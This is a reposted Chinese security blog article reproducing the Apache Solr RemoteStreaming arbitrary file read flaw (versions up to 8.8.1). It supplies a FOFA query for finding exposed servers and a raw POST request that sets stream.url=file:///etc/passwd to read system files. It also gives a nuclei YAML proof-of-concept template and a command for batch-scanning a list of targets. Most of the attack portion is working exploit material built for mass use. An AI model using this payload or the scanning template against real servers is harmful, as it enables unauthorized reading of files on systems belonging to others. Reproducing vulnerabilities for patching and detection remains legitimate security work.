Apache Solr RemoteStreaming 任意文件读取

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 Apache Solr RemoteStreaming 任意文件读取

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

 ApacheSolr是一个功能强大的开源搜索服务器,它支持REST风格API。在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成任意文件读取。

图片[1]-Apache Solr RemoteStreaming 任意文件读取-安全小天地

0x03 漏洞复现

漏洞影响: Apache Solr <= 8.8.1

FOFA:app=”APACHE-Solr”

1.抓包并修改payload,即可任意读取/etc/passwd

POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1
Host: x.x.x.x:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

stream.url=file:///etc/passwd
图片[2]-Apache Solr RemoteStreaming 任意文件读取-安全小天地

2.nuclei漏洞脚本如下(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei


批量验证命令:
nuclei.exe -l subs.txt -t solr-ContentStreams.yaml

yaml POC:
id: solr-ContentStreams

info:
  name: solr-ContentStreams-Fileread
  author: sm
  severity: high
  description: |
    solr-ContentStreams-Fileread
  reference:
    - https://blog.csdn.net/sycamorelg/article/details/120706240
  tags: Apache Solr

requests:
  - raw:
      - |
        POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 29

        stream.url=file:///etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        words:
          - \"root\"
          - \"solr:x\"
        condition: and

      - type: status
        status:
          - 200
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容